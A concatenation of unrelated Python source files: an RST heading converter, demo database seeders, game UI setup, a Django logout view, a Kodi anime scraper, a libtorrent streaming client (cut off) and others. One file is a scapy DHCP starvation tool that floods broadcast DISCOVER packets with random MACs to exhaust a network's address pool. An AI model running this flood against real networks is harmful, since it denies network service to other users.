rst_file_content[lineno + 1] = ':raw-latex:`\label{' + self.heading_to_label(line, 'paragraph') + '}`'
# headings level 6
# print('looking for h6 ...')
if (
(previous_line.isspace() or previous_line == '') and
self.h_content_regex.match(line) and
self.h6_underlining_regex.match(next_line) and
len(self.h_content_regex.match(line).group()) == len(self.h6_underlining_regex.match(next_line).group())
):
print('found a h6:', line)
# heading_labels.append(self.heading_to_label(line, 'subparagraph'))
headings_dict[line] = self.heading_to_label(line, 'subparagraph')
rst_file_content[lineno] = ':raw-latex:`\subparagraph{' + line + '}`'
rst_file_content[lineno + 1] = ':raw-latex:`\label{' + self.heading_to_label(line, 'subparagraph') + '}`'
return headings_dict
def heading_to_label(self, heading_text, level):
heading_text = heading_text.lower()
replaced_chars = {
' ': '-',
'(': '',
')': ''
}
for key,value in replaced_chars.items():
heading_text = heading_text.replace(key, value)
return '{0}:{1}'.format(level, heading_text)
# self.chapter_delimiter_regex = re.compile(r'={3,}') # =============
# self.section_delimiter_regex = re.compile(r'-{3,}') # -------------
# self.subsection_delimiter_regex = re.compile(r'~{3,}') # ~~~~~~~~~~~~~
# self.subsubsection_delimiter_regex = re.compile(r'\^{3,}') # ^^^^^^^^^^^^^
# self.heading_text_regex = re.compile(
# r'''
# ^
# \s*
# (?P<title_text>
# [a-zA-Z0-9]
# [a-zA-Z0-9_ -]*
# [a-zA-Z0-9]
# )
# \s*
# $''',
# re.VERBOSE)
# self.heading_keys = []
|
'''
Provides schema and insert queries for the practitioner table
information about the practitioners (dentists hygienists etc..)
'''
from lib_openmolar.common.db_orm import InsertableRecord
TABLENAME = "practitioners"
class DemoGenerator(object):
def __init__(self, database=None):
self.length = 4
self.record = InsertableRecord(database, TABLENAME)
self.record.remove(self.record.indexOf("time_stamp"))
def demo_queries(self):
'''
return a list of queries to populate a demo database
'''
## practitioner 1
self.record.setValue('user_id', 1)
self.record.setValue('type',"dentist")
self.record.setValue('status', "active")
self.record.setValue('modified_by', "demo_installer")
yield self.record.insert_query
self.record.clearValues()
## practitioner 2
self.record.setValue('user_id', 2)
self.record.setValue('type',"dentist")
self.record.setValue('status', "active")
self.record.setValue('modified_by', "demo_installer")
yield self.record.insert_query
self.record.clearValues()
## practitioner 3
self.record.setValue('user_id', 3)
self.record.setValue('type',"dentist")
self.record.setValue('speciality', 'Orthodontics')
self.record.setValue('status', "active")
self.record.setValue('modified_by', "demo_installer")
yield self.record.insert_query
self.record.clearValues()
## practitioner 4
self.record.setValue('user_id', 4)
self.record.setValue('type',"hygienist")
self.record.setValue('status', "active")
self.record.setValue('modified_by', "demo_installer")
yield self.record.insert_query
if __name__ == "__main__":
from lib_openmolar.admin.connect import DemoAdminConnection
sc = DemoAdminConnection()
sc.connect()
builder = DemoGenerator(sc)
print builder.demo_queries()
|
import os
import traceback
from pysollib.mygettext import _
from pysollib.settings import TITLE
from pysollib.settings import VERSION
from pysollib.settings import TOOLKIT, USE_TILE
from pysollib.settings import DEBUG
from pysollib.mfxutil import print_err
if TOOLKIT == 'tk':
if USE_TILE:
from pysollib.tile import ttk
def init_tile(app, top):
# load available themes
d = os.path.join(app.dataloader.dir, 'themes')
if os.path.isdir(d):
top.tk.eval('global auto_path; lappend auto_path {%s}' % d)
for t in os.listdir(d):
if os.path.exists(os.path.join(d, t, 'pkgIndex.tcl')):
try:
top.tk.eval('package require ttk::theme::'+t)
# print 'load theme:', t
except Exception:
traceback.print_exc()
pass
def set_theme(app, top, theme):
# set theme
style = ttk.Style(top)
try:
style.theme_use(theme)
except Exception:
print_err(_('invalid theme name: ') + theme)
style.theme_use(app.opt.default_tile_theme)
def get_font_name(font):
# create font name
# i.e. "helvetica 12" -> ("helvetica", 12, "roman", "normal")
if (TOOLKIT == 'kivy'):
return "helvetica 12"
from six.moves.tkinter_font import Font
font_name = None
try:
f = Font(font=font)
except Exception:
print_err(_('invalid font name: ') + font)
if DEBUG:
traceback.print_exc()
else:
fa = f.actual()
font_name = (fa['family'],
fa['size'],
fa['slant'],
fa['weight'])
return font_name
def base_init_root_window(root, app):
# root.wm_group(root)
root.wm_title(TITLE + ' ' + VERSION)
root.wm_iconname(TITLE + ' ' + VERSION)
# set minsize
sw, sh = (root.winfo_screenwidth(), root.winfo_screenheight())
if sw < 640 or sh < 480:
root.wm_minsize(400, 300)
else:
root.wm_minsize(520, 360)
if TOOLKIT == 'gtk':
pass
if TOOLKIT == 'kivy':
pass
elif USE_TILE:
theme = app.opt.tile_theme
init_tile(app, root)
set_theme(app, root, theme)
else:
pass
class BaseTkSettings:
canvas_padding = (0, 0)
horizontal_toolbar_padding = (0, 0)
vertical_toolbar_padding = (0, 1)
toolbar_button_padding = (2, 2)
toolbar_label_padding = (4, 4)
if USE_TILE:
toolbar_relief = 'flat'
toolbar_borderwidth = 0
else:
toolbar_relief = 'raised'
toolbar_button_relief = 'flat'
toolbar_separator_relief = 'sunken'
toolbar_borderwidth = 1
toolbar_button_borderwidth = 1
|
import sys
g = {}
n = {}
for line in sys.stdin:
(n1, n2, p, q, t, tg, x) = line.strip().split(' ')
t = int(t)
x = float(x)
key = ' '.join((n1,n2,p,q))
if not key in n:
n[key] = 0
g[key] = 0
n[key] += t
g[key] += x*t
for key in n:
print key, n[key], g[key]/n[key]
|
from __future__ import absolute_import, print_function, unicode_literals
from django.contrib.auth import REDIRECT_FIELD_NAME
from django.shortcuts import redirect
from django.contrib.auth.views import logout as original_logout
from loginas import settings as la_settings
from loginas.utils import restore_original_login
def logout(request, next_page=None, template_name='registration/logged_out.html',
redirect_field_name=REDIRECT_FIELD_NAME, extra_context=None):
"""
This can replace your default logout view. In you settings, do:
from django.core.urlresolvers import reverse_lazy
LOGOUT_URL = reverse_lazy('logout')
"""
original_session = request.session.get(la_settings.USER_SESSION_FLAG)
if original_session:
restore_original_login(request)
return redirect(la_settings.LOGOUT_REDIRECT)
else:
return original_logout(request, next_page, template_name, redirect_field_name, extra_context)
|
import traceback
import tempfile
import weka.core.jvm as jvm
from weka.flow.control import Flow
from weka.flow.source import ListFiles
from weka.flow.sink import Console
def main():
"""
Just runs some example code.
"""
# setup the flow
flow = Flow(name="list files")
# flow.print_help()
listfiles = ListFiles()
listfiles.config["dir"] = str(tempfile.gettempdir())
listfiles.config["list_files"] = True
listfiles.config["list_dirs"] = False
listfiles.config["recursive"] = False
listfiles.config["regexp"] = ".*r.*"
# listfiles.print_help()
flow.actors.append(listfiles)
console = Console()
console.config["prefix"] = "Match: "
# console.print_help()
flow.actors.append(console)
# run the flow
msg = flow.setup()
if msg is None:
print("\n" + flow.tree + "\n")
msg = flow.execute()
if msg is not None:
print("Error executing flow:\n" + msg)
else:
print("Error setting up flow:\n" + msg)
flow.wrapup()
flow.cleanup()
if __name__ == "__main__":
try:
jvm.start()
main()
except Exception, e:
print(traceback.format_exc())
finally:
jvm.stop()
|
"""
Copyright 2015 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
class SeriesActors(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
SeriesActors - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'data': 'list[SeriesActorsData]'
}
self.attribute_map = {
'data': 'data'
}
self._data = None
@property
def data(self):
"""
Gets the data of this SeriesActors.
:return: The data of this SeriesActors.
:rtype: list[SeriesActorsData]
"""
return self._data
@data.setter
def data(self, data):
"""
Sets the data of this SeriesActors.
:param data: The data of this SeriesActors.
:type: list[SeriesActorsData]
"""
self._data = data
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
import os
import sys
import subprocess
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from lutris.util.wineregistry import WineRegistry
PREFIXES_PATH = os.path.expanduser("~/Games/wine/prefixes")
def get_registries():
registries = []
directories = os.listdir(PREFIXES_PATH)
directories.append(os.path.expanduser("~/.wine"))
for prefix in directories:
for path in os.listdir(os.path.join(PREFIXES_PATH, prefix)):
if path.endswith(".reg"):
registries.append(os.path.join(PREFIXES_PATH, prefix, path))
return registries
def check_registry(registry_path):
with open(registry_path, 'r') as registry_file:
original_content = registry_file.read()
try:
registry = WineRegistry(registry_path)
except:
sys.stderr.write("Error parsing {}\n".format(registry_path))
raise
content = registry.render()
if content != original_content:
wrong_path = os.path.join(os.path.dirname(__file__), 'error.reg')
with open(wrong_path, 'w') as wrong_reg:
wrong_reg.write(content)
print("Content of parsed registry doesn't match: {}".format(registry_path))
subprocess.call(["meld", registry_path, wrong_path])
sys.exit(2)
registries = get_registries()
for registry in registries:
check_registry(registry)
print("All {} registry files validated!".format(len(registries)))
|
# -*- coding: utf-8 -*-
import re
from channels import renumbertools
from channelselector import get_thumb
from core import httptools
from core import scrapertools
from core import servertools
from core import tmdb
from core.item import Item
from platformcode import config, logger
from channels import autoplay
IDIOMAS = {'latino': 'Latino'}
list_language = IDIOMAS.values()
list_servers = ['openload',
'okru',
'netutv',
'rapidvideo'
]
list_quality = ['default']
host = "http://www.anitoonstv.com"
def mainlist(item):
logger.info()
thumb_series = get_thumb("channels_tvshow.png")
autoplay.init(item.channel, list_servers, list_quality)
itemlist = list()
itemlist.append(Item(channel=item.channel, action="lista", title="Anime", url=host,
thumbnail=thumb_series))
itemlist.append(Item(channel=item.channel, action="lista", title="Series Animadas", url=host,
thumbnail=thumb_series))
itemlist.append(Item(channel=item.channel, action="lista", title="Novedades", url=host,
thumbnail=thumb_series))
itemlist.append(Item(channel=item.channel, action="lista", title="Pokemon", url=host,
thumbnail=thumb_series))
itemlist = renumbertools.show_option(item.channel, itemlist)
autoplay.show_option(item.channel, itemlist)
return itemlist
def lista(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t|\s{2}| ", "", data)
if 'Novedades' in item.title:
patron_cat = '<div class="activos"><h3>(.+?)<\/h2><\/a><\/div>'
patron = '<a href="(.+?)"><h2><span>(.+?)<\/span>'
else:
patron_cat = '<li><a href=.+?>'
patron_cat += str(item.title)
patron_cat += '<\/a><div>(.+?)<\/div><\/li>'
patron = "<a href='(.+?)'>(.+?)<\/a>"
data = scrapertools.find_single_match(data, patron_cat)
matches = scrapertools.find_multiple_matches(data, patron)
for link, name in matches:
if "Novedades" in item.title:
url = link
title = name.capitalize()
else:
url = host + link
title = name
if ":" in title:
cad = title.split(":")
show = cad[0]
else:
if "(" in title:
cad = title.split("(")
if "Super" in title:
show = cad[1]
show = show.replace(")", "")
else:
show = cad[0]
else:
show = title
if "&" in show:
cad = title.split("xy")
show = cad[0]
context1=[renumbertools.context(item), autoplay.context]
itemlist.append(
item.clone(title=title, url=url, plot=show, action="episodios", show=show,
context=context1))
tmdb.set_infoLabels(itemlist)
return itemlist
def episodios(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t|\s{2}| ", "", data)
patron = '<div class="pagina">(.+?)<\/div><div id="fade".+?>'
data = scrapertools.find_single_match(data, patron)
patron_caps = "<a href='(.+?)'>Capitulo: (.+?) - (.+?)<\/a>"
matches = scrapertools.find_multiple_matches(data, patron_caps)
show = scrapertools.find_single_match(data, '<span>Titulo.+?<\/span>(.+?)<br><span>')
scrapedthumbnail = scrapertools.find_single_match(data, "<img src='(.+?)'.+?>")
scrapedplot = scrapertools.find_single_match(data, '<span>Descripcion.+?<\/span>(.+?)<br>')
i = 0
temp = 0
for link, cap, name in matches:
if int(cap) == 1:
temp = temp + 1
if int(cap) < 10:
cap = "0" + cap
season = temp
episode = int(cap)
season, episode = renumbertools.numbered_for_tratk(
item.channel, item.show, season, episode)
date = name
title = "%sx%s %s (%s)" % (season, str(episode).zfill(2), "Episodio %s" % episode, date)
# title = str(temp)+"x"+cap+" "+name
url = host + "/" + link
if "NO DISPONIBLE" not in name:
itemlist.append(Item(channel=item.channel, action="findvideos", title=title, thumbnail=scrapedthumbnail,
plot=scrapedplot, url=url, show=show))
if config.get_videolibrary_support() and len(itemlist) > 0:
itemlist.append(Item(channel=item.channel, title="Añadir esta serie a la videoteca", url=item.url,
action="add_serie_to_library", extra="episodios", show=show))
return itemlist
def findvideos(item):
logger.info()
itemlist = []
data = httptools.downloadpage(item.url).data
data1 = re.sub(r"\n|\r|\t|\s{2}| ", "", data)
data_vid = scrapertools.find_single_match(data1, '<div class="videos">(.+?)<\/div><div .+?>')
# name = scrapertools.find_single_match(data,'<span>Titulo.+?<\/span>([^<]+)<br>')
scrapedplot = scrapertools.find_single_match(data, '<br><span>Descrip.+?<\/span>([^<]+)<br>')
scrapedthumbnail = scrapertools.find_single_match(data, '<div class="caracteristicas"><img src="([^<]+)">')
itemla = scrapertools.find_multiple_matches(data_vid, '<div class="serv">.+?-(.+?)-(.+?)<\/div><.+? src="(.+?)"')
for server, quality, url in itemla:
if "Calidad Alta" in quality:
quality = quality.replace("Calidad Alta", "HQ")
server = server.lower().strip()
if "ok" == server:
server = 'okru'
if "netu" == server:
continue
itemlist.append(item.clone(url=url, action="play", server=server, contentQuality=quality,
thumbnail=scrapedthumbnail, plot=scrapedplot,
title="Enlace encontrado en %s: [%s]" % (server.capitalize(), quality)))
autoplay.start(itemlist, item)
return itemlist
def play(item):
logger.info()
itemlist = []
# Buscamos video por servidor ...
devuelve = servertools.findvideosbyserver(item.url, item.server)
if not devuelve:
# ...sino lo encontramos buscamos en todos los servidores disponibles
devuelve = servertools.findvideos(item.url, skip=True)
if devuelve:
# logger.debug(devuelve)
itemlist.append(Item(channel=item.channel, title=item.contentTitle, action="play", server=devuelve[0][2],
url=devuelve[0][1], thumbnail=item.thumbnail))
return itemlist
|
import argparse
import logging
import string
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy import volatile # noqa: E402
from scapy import sendrecv # noqa: E402
from scapy import config # noqa: E402
from scapy.layers import l2 # noqa: E402
from scapy.layers import inet # noqa: E402
from scapy.layers import dhcp # noqa: E402
from scapy import route # noqa: E402, F401
from scapy import route6 # noqa: E402, F401
def dhcp_flood(**kwargs):
iface = kwargs["interface"]
count = kwargs["count"]
unique_hexdigits = str.encode("".join(set(string.hexdigits.lower())))
packet = (
l2.Ether(dst="ff:ff:ff:ff:ff:ff") /
inet.IP(src="0.0.0.0", dst="255.255.255.255") /
inet.UDP(sport=68, dport=67) /
dhcp.BOOTP(chaddr=volatile.RandString(12, unique_hexdigits)) /
dhcp.DHCP(options=[("message-type", "discover"), "end"])
)
sendrecv.sendp(
packet,
iface=iface,
count=count
)
def print_dhcp_response(response):
print("Source: {}".format(response[l2.Ether].src))
print("Destination: {}".format(response[l2.Ether].dst))
for option in response[dhcp.DHCP].options:
if isinstance(option, tuple):
option, *values = option
else:
# For some reason some options are strings instead of tuples
option, *values = option, None
if option in ["end", "pad"]:
break
output = "Option: {} -> {}".format(option, values)
if option == "message-type" and len(values) == 1:
dhcp_type = dhcp.DHCPTypes.get(values[0], "unknown")
output = "{} ({})".format(output, dhcp_type)
print(output)
def dhcp_sniff(**kwargs):
sendrecv.sniff(filter="udp and (port 67 or 68)", prn=print_dhcp_response)
def parse_args():
p = argparse.ArgumentParser(description='''
All your IPs are belong to us.
''', formatter_class=argparse.RawTextHelpFormatter)
p.add_argument(
'-i',
'--interface',
action='store',
default=config.conf.iface,
help='network interface to use'
)
subparsers = p.add_subparsers(dest='command')
subparsers.required = True
flood = subparsers.add_parser('flood')
flood.add_argument(
'-c',
'--count',
action='store',
default=10,
type=int,
help='number of addresses to consume'
)
subparsers.add_parser('sniff')
args = p.parse_args()
return args
def main():
args = parse_args()
dispatch = {
"flood": dhcp_flood,
"sniff": dhcp_sniff,
}
dispatch[args.command](**vars(args))
if __name__ == "__main__":
main()
|
import os
import pickle
import random
import time
import urllib
try:
import xbmc, xbmcgui
except:
pass
from platformcode import config, logger
LIBTORRENT_PATH = config.get_setting("libtorrent_path", server="torrent", default='')
from servers import torrent as torr
lt, e, e1, e2 = torr.import_libtorrent(LIBTORRENT_PATH)
from cache import Cache
from dispatcher import Dispatcher
from file import File
from handler import Handler
from monitor import Monitor
from resume_data import ResumeData
from server import Server
try:
BUFFER = int(config.get_setting("bt_buffer", server="torrent", default="50"))
except:
BUFFER = 50
config.set_setting("bt_buffer", "50", server="torrent")
DOWNLOAD_PATH = config.get_setting("bt_download_path", server="torrent", default=config.get_setting("downloadpath"))
BACKGROUND = config.get_setting("mct_background_download", server="torrent", default=True)
RAR = config.get_setting("mct_rar_unpack", server="torrent", default=True)
msg_header = 'Alfa BT Cliente Torrent'
class Client(object):
INITIAL_TRACKERS = ['udp://tracker.openbittorrent.com:80',
'udp://tracker.istole.it:80',
'udp://open.demonii.com:80',
'udp://tracker.coppersurfer.tk:80',
'udp://tracker.leechers-paradise.org:6969',
'udp://exodus.desync.com:6969',
'udp://tracker.publicbt.com:80',
'http://tracker.torrentbay.to:6969/announce',
'http://tracker.pow7.com/announce',
'udp://tracker.ccc.de:80/announce',
'udp://open.demonii.com:1337',
'http://9.rarbg.com:2710/announce',
'http://bt.careland.com.cn:6969/announce',
'http://explodie.org:6969/announce',
'http://mgtracker.org:2710/announce',
'http://tracker.best-torrents.net:6969/announce',
'http://tracker.tfile.me/announce',
'http://tracker1.wasabii.com.tw:6969/announce',
'udp://9.rarbg.com:2710/announce',
'udp://9.rarbg.me:2710/announce',
'udp://coppersurfer.tk:6969/announce',
'http://www.spanishtracker.com:2710/announce',
'http://www.todotorrents.com:2710/announce'
] ### Added some trackers from MCT
VIDEO_EXTS = {'.avi': 'video/x-msvideo', '.mp4': 'video/mp4', '.mkv': 'video/x-matroska',
'.m4v': 'video/mp4', '.mov': 'video/quicktime', '.mpg': 'video/mpeg', '.ogv': 'video/ogg',
'.ogg': 'video/ogg', '.webm': 'video/webm', '.ts': 'video/mp2t', '.3gp': 'video/3gpp',
'.rar': 'video/unrar'}
def __init__(self, url=None, port=None, ip=None, auto_shutdown=True, wait_time=20, timeout=5, auto_delete=True,
temp_path=None, is_playing_fnc=None, print_status=False):
# server
if port:
self.port = port
else:
self.port = random.randint(8000, 8099)
if ip:
self.ip = ip
else:
self.ip = "127.0.0.1"
self.server = Server((self.ip, self.port), Handler, client=self)
# Options
if temp_path:
self.temp_path = temp_path
else:
self.temp_path = DOWNLOAD_PATH
self.is_playing_fnc = is_playing_fnc
self.timeout = timeout
self.auto_delete = auto_delete
self.wait_time = wait_time
self.auto_shutdown = auto_shutdown
self.buffer_size = BUFFER
self.first_pieces_priorize = BUFFER
self.last_pieces_priorize = 5
self.state_file = "state"
try:
self.torrent_paramss = {'save_path': self.temp_path, 'storage_mode': lt.storage_mode_t.storage_mode_allocate}
except Exception, e:
try:
do = xbmcgui.Dialog()
e = e1 or e2
do.ok('ERROR en el cliente BT Libtorrent', 'Módulo no encontrado o imcompatible con el dispositivo.',
'Reporte el fallo adjuntando un "log".', str(e))
except:
pass
return
# State
self.has_meta = False
self.meta = None
self.start_time = None
self.last_connect = 0
self.connected = False
self.closed = False
self.file = None
self.files = None
self._th = None
self.seleccion = 0
self.index = 0
# Sesion
self._cache = Cache(self.temp_path)
self._ses = lt.session()
#self._ses.listen_on(0, 0) ### ALFA: it blocks repro of some .torrents
# Cargamos el archivo de estado (si existe)
""" ### ALFA: it blocks repro of some .torrents
if os.path.exists(os.path.join(self.temp_path, self.state_file)):
try:
f = open(os.path.join(self.temp_path, self.state_file), "rb")
state = pickle.load(f)
self._ses.load_state(state)
f.close()
except:
pass
"""
self._start_services()
# Monitor & Dispatcher
self._monitor = Monitor(self)
if print_status:
self._monitor.add_listener(self.print_status)
self._monitor.add_listener(self._check_meta)
self._monitor.add_listener(self.save_state)
self._monitor.add_listener(self.priorize_start_file)
self._monitor.add_listener(self.announce_torrent)
if self.auto_shutdown:
self._monitor.add_listener(self._auto_shutdown)
self._dispatcher = Dispatcher(self)
self._dispatcher.add_listener(self._update_ready_pieces)
# Iniciamos la URL
if url:
self.start_url(url)
def set_speed_limits(self, download=0, upload=0):
"""
Función encargada de poner límites a la velocidad de descarga o subida
"""
if isinstance(download, int) and download > 0:
self._th.set_download_limit(download * 1024)
if isinstance(upload, int) and download > 0:
self._th.set_upload_limit(upload * 1024)
def get_play_list(self):
"""
Función encargada de generar el playlist
"""
# Esperamos a lo metadatos
while not self.has_meta:
time.sleep(1)
# Comprobamos que haya archivos de video
if self.files:
if len(self.files) > 1:
return "http://" + self.ip + ":" + str(self.port) + "/playlist.pls"
else:
return "http://" + self.ip + ":" + str(self.port) + "/" + urllib.quote(self.files[0].path)
def get_files(self):
"""
Función encargada de genera el listado de archivos
"""
# Esperamos a lo metadatos
while not self.has_meta:
time.sleep(1)
files = []
# Comprobamos que haya archivos de video
if self.files:
# Creamos el dict con los archivos
for file in self.files:
n = file.path
u = "http://" + self.ip + ":" + str(self.port) + "/" + urllib.quote(n)
s = file.size
files.append({"name": n, "url": u, "size": s})
return files
def _find_files(self, files, search=None):
"""
Función encargada de buscar los archivos reproducibles del torrent
"""
self.total_size = 0
# Obtenemos los archivos que la extension este en la lista
videos = filter(lambda f: self.VIDEO_EXTS.has_key(os.path.splitext(f.path)[1]), files)
if not videos:
raise Exception('No video files in torrent')
for v in videos:
self.total_size += v.size ### ALFA
videos[videos.index(v)].index = files.index(v)
return videos
def set_file(self, f):
"""
Función encargada de seleccionar el archivo que vamos a servir y por tanto, priorizar su descarga
"""
# Seleccionamos el archivo que vamos a servir
fmap = self.meta.map_file(f.index, 0, 1)
self.file = File(f.path, self.temp_path, f.index, f.size, fmap, self.meta.piece_length(), self)
if self.seleccion < 0: ### ALFA
self.file.first_piece = 0 ### ALFA
self.file.last_piece = self.meta.num_pieces() ### ALFA
self.file.size = self.total_size ### ALFA
self.prioritize_file()
def prioritize_piece(self, pc, idx):
"""
Función encargada de priorizar una determinada pieza
"""
piece_duration = 1000
min_deadline = 2000
dl = idx * piece_duration + min_deadline
""" ### ALFA
try:
self._th.set_piece_deadline(pc, dl, lt.deadline_flags.alert_when_available)
except:
pass
"""
if idx == 0:
tail_pieces = 9
# Piezas anteriores a la primera se desactivan
if (self.file.last_piece - pc) > tail_pieces:
for i in xrange(self.file.first_piece, pc):
self._th.piece_priority(i, 0)
self._th.reset_piece_deadline(i)
# Piezas siguientes a la primera se activan
for i in xrange(pc + 1, self.file.last_piece + 1):
#self._th.piece_priority(i, 0)
self._th.piece_priority(i, 1)
def prioritize_file(self):
"""
Función encargada de priorizar las piezas correspondientes al archivo seleccionado en la funcion set_file()
"""
priorities = []
for i in xrange(self.meta.num_pieces()):
if i >= self.file.first_piece and i <= self.file.last_piece:
priorities.append(1)
else:
if self.index < 0:
priorities.append(1) ### ALFA
else:
priorities.append(0) ### ALFA
self._th.prioritize_pieces(priorities)
x = 0
for i, _set in enumerate(self._th.piece_priorities()):
if _set > 0: x += 1
#logger.info("***** Nº Pieza: %s: %s" % (i, str(_set)))
logger.info("***** Piezas %s : Activas: %s" % (str(i+1), str(x)))
logger.info("***** first_piece %s : last_piece: %s" % (str(self.file.first_piece), str(self.file.last_piece)))
def download_torrent(self, url):
"""
Función encargada de descargar un archivo .torrent
"""
from core import httptools
data = httptools.downloadpage(url).data
return data
def start_url(self, uri):
"""
Función encargada iniciar la descarga del torrent desde la url, permite:
- Url apuntando a un .torrent
- Url magnet
- Archivo .torrent local
"""
if self._th:
raise Exception('Torrent is already started')
if uri.startswith('http://') or uri.startswith('https://'):
torrent_data = self.download_torrent(uri)
info = lt.torrent_info(lt.bdecode(torrent_data))
tp = {'ti': info}
resume_data = self._cache.get_resume(info_hash=str(info.info_hash()))
if resume_data:
tp['resume_data'] = resume_data
elif uri.startswith('magnet:'):
tp = {'url': uri}
resume_data = self._cache.get_resume(info_hash=Cache.hash_from_magnet(uri))
if resume_data:
tp['resume_data'] = resume_data
elif os.path.isfile(uri):
if os.access(uri, os.R_OK):
info = lt.torrent_info(uri)
tp = {'ti': info}
resume_data = self._cache.get_resume(info_hash=str(info.info_hash()))
if resume_data:
tp['resume_data'] = resume_data
else:
raise ValueError('Invalid torrent path %s' % uri)
else:
raise ValueError("Invalid torrent %s" % uri)
tp.update(self.torrent_paramss)
self._th = self._ses.add_torrent(tp)
for tr in self.INITIAL_TRACKERS:
self._th.add_tracker({'url': tr})
self._th.set_sequential_download(True)
self._th.force_reannounce()
self._th.force_dht_announce()
self._monitor.start()
self._dispatcher.do_start(self._th, self._ses)
self.server.run()
def stop(self):
"""
Función encargada de de detener el torrent y salir
"""
self._dispatcher.stop()
self._dispatcher.join()
self._monitor.stop()
self.server.stop()
self._dispatcher.stop()
if self._ses:
self._ses.pause()
if self._th:
self.save_resume()
self.save_state()
self._stop_services()
self._ses.remove_torrent(self._th, self.auto_delete)
del self._ses
self.closed = True
def pause(self):
"""
Función encargada de de pausar el torrent
"""
self._ses.pause()
def _start_services(self):
"""
Función encargada de iniciar los servicios de libtorrent: dht, lsd, upnp, natpnp
"""
self._ses.add_dht_router("router.bittorrent.com", 6881)
self._ses.add_dht_router("router.bitcomet.com", 554)
self._ses.add_dht_router("router.utorrent.com", 6881)
self._ses.add_dht_router("dht.transmissionbt.com",6881) ### from MCT
self._ses.start_dht()
self._ses.start_lsd()
self._ses.start_upnp()
self._ses.start_natpmp()
def _stop_services(self):
"""
Función encargada de detener los servicios de libtorrent: dht, lsd, upnp, natpnp
"""
self._ses.stop_natpmp()
self._ses.stop_upnp()
self._ses.stop_lsd()
self._ses.stop_dht()
def save_resume(self):
"""
Función encargada guardar los metadatos para continuar una descarga mas rapidamente
"""
if self._th.need_save_resume_data() and self._th.is_valid() and self.meta:
r = ResumeData(self)
start = time.time()
while (time.time() - start) <= 5:
if r.data or r.failed:
break
time.sleep(0.1)
if r.data:
self._cache.save_resume(self.unique_file_id, lt.bencode(r.data))
@property
def status(self):
"""
Función encargada de devolver el estado del torrent
"""
if self._th:
s = self._th.status()
# Download Rate
s._download_rate = s.download_rate / 1024
# Progreso del archivo
if self.file:
pieces = s.pieces[self.file.first_piece:self.file.last_piece] ### ALFA
progress = float(sum(pieces)) / len(pieces)
s.pieces_len = len(pieces) ### ALFA
s.pieces_sum = sum(pieces) ### ALFA
#logger.info('***** Estado piezas: %s' % pieces)
else:
progress = 0
s.pieces_len = 0 ### ALFA
s.pieces_sum = 0 ### ALFA
s.progress_file = progress * 100
# Tamaño del archivo
s.file_name = '' ### ALFA
s.seleccion = '' ### ALFA
if self.file:
s.seleccion = self.seleccion ### ALFA
s.file_name = self.file.path ### ALFA
s.file_size = self.file.size / 1048576.0
else:
s.file_size = 0
# Estado del buffer
if self.file and self.file.cursor: # Con una conexion activa: Disponible vs Posicion del reproductor
percent = len(self.file.cursor.cache)
percent = percent * 100 / self.buffer_size
s.buffer = int(percent)
elif self.file: # Sin una conexion activa: Pre-buffer antes de iniciar
# El Pre-buffer consta de dos partes_
# 1. Buffer al inicio del archivo para que el reproductor empieze sin cortes
# 2. Buffer al final del archivo (en algunos archivos el reproductor mira el final del archivo antes de comenzar)
bp = []
# El tamaño del buffer de inicio es el tamaño del buffer menos el tamaño del buffer del final
first_pieces_priorize = self.buffer_size - self.last_pieces_priorize
# Comprobamos qué partes del buffer del inicio estan disponibles
for x in range(first_pieces_priorize):
if self._th.have_piece(self.file.first_piece + x):
bp.append(True)
else:
bp.append(False)
# Comprobamos qué partes del buffer del final estan disponibles
for x in range(self.last_pieces_priorize):
if self._th.have_piece(self.file.last_piece - x):
bp.append(True)
else:
bp.append(False)
s.buffer = int(sum(bp) * 100 / self.buffer_size)
else: # Si no hay ningun archivo seleccionado: No hay buffer
s.buffer = 0
# Tiempo restante para cerrar en caso de tener el timeout activo
if self.auto_shutdown:
if self.connected:
if self.timeout:
s.timeout = int(self.timeout - (time.time() - self.last_connect - 1))
if self.file and self.file.cursor:
s.timeout = self.timeout
if s.timeout < 0: s.timeout = "Cerrando"
else:
s.timeout = "---"
else:
if self.start_time and self.wait_time:
s.timeout = int(self.wait_time - (time.time() - self.start_time - 1))
if s.timeout < 0: s.timeout = "Cerrando"
else:
s.timeout = "---"
else:
s.timeout = "Off"
# Estado de la descarga
STATE_STR = ['En cola', 'Comprobando', 'Descargando metadata', \
'Descargando', 'Finalizado', 'Seeding', 'Allocating', 'Comprobando fastresume']
s.str_state = STATE_STR[s.state]
# Estado DHT
if self._ses.dht_state() is not None:
s.dht_state = "On"
s.dht_nodes = self._ses.status().dht_nodes
else:
s.dht_state = "Off"
s.dht_nodes = 0
# Cantidad de Trackers
s.trackers = len(self._th.trackers())
# Origen de los peers
s.dht_peers = 0
s.trk_peers = 0
s.pex_peers = 0
s.lsd_peers = 0
for peer in self._th.get_peer_info():
if peer.source & 1:
s.trk_peers += 1
if peer.source & 2:
s.dht_peers += 1
if peer.source & 4:
